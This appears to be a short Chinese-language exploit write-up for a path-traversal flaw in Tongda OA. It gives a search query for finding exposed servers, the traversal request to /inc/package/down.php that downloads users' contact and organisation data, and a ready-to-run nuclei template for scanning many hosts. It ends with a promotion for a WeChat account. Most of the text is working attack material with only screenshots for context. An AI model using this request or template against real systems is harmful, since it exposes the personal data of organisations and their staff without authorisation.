漏洞描述

通达OA down 接口可下载用户联系人信息。

空间语法

app="TDXK-通达OA"

利用过程

登录界面

1701356187326.png

down接口可下载用户联系人信息。

http://xxxxx/inc/package/down.php?id=../../../cache/org

响应包

1701356345404.png

下载查看获得信息

1701356529286.png

nuclei

id: Tongda-down-userinfo
info:
  name: Tongda-down-userinfo
  author: xxx
  severity: high
  description: description
  reference:
    - https://
  tags: Tongda
requests:
  - raw:
      - |+
        GET /inc/package/down.php?id=../../../cache/org HTTP/1.1
        Host: {{Hostname}}



    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - filename
      - type: word
        part: header
        words:
          - '200'
      - type: status
        status:
          - 200

关注公众号“AY长歌”学习